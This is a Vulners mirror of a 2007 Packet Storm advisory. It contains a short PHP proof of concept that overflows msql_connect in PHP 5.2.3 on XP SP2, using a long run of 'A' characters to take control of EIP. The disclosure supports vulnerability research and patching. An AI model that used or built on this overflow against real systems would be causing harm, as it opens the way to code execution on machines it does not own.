Lucene search
K

phpmsql-overflow.txt

🗓️ 08 Aug 2007 00:00:00Reported by Nima GhotbiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

PHP mSQL Buffer Overflow PoC for version 5.2.3 (XP SP2) by NetJackal

Code
`<?php  
  
##########################################################  
###----------------------------------------------------###  
###----PHP mSQL (msql_connect) Buffer Overflow PoC-----###  
###----------------------------------------------------###  
###-Tested on 5.2.3 (XP SP2)---------------------------###  
###----------------------------------------------------###  
###-Author:--NetJackal---------------------------------###  
###-Email:---nima_501[at]yahoo[dot]com-----------------###  
###-Website:-http://netjackal.by.ru--------------------###  
###----------------------------------------------------###  
##########################################################  
  
if(!function_exists('msql_connect'))  
die('mSQL extension is not available');  
  
#msql_pconnect(str_repeat('A',49424).'BBBB');  
  
msql_connect(str_repeat('A',49424).'BBBB'); # EIP => 42424242  
  
?>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation